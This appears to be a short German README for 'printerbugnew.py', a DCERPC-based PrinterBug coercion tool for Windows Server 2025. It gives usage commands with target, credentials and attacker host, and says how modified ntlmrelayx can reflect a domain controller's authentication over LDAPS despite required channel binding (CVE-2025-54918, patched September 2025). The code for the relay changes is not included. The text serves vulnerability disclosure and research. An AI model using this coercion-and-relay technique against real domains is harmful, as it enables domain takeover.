
Die DCERPC-only printerbug.py Version
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Dieser Exploit über Reflection funktioniert nur auf W2025 mit dem "neuen" Printerbug (DCERPC statt Named Pipes).
Sie müssen ntlmrelayx an einigen Stellen modifizieren, damit es funktioniert. Danach können Sie den Printerbug auf einem W2025-DC remote auslösen und die Authentifizierung über LDAPS(!) reflektieren, selbst wenn Channel Bindings ERFORDERLICH ist
ldaprelayclient.py:

rpcrelayserver.py
und relay ;)

Die Schwachstelle wurde im September 2025 Patch Tuesday behoben: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
Der Fix stellt sicher, dass das MIC immer berechnet wird, selbst wenn die Type-3-Nachricht leer ist.
Dank an den Autor dieser CVE für einen wertvollen Hinweis :)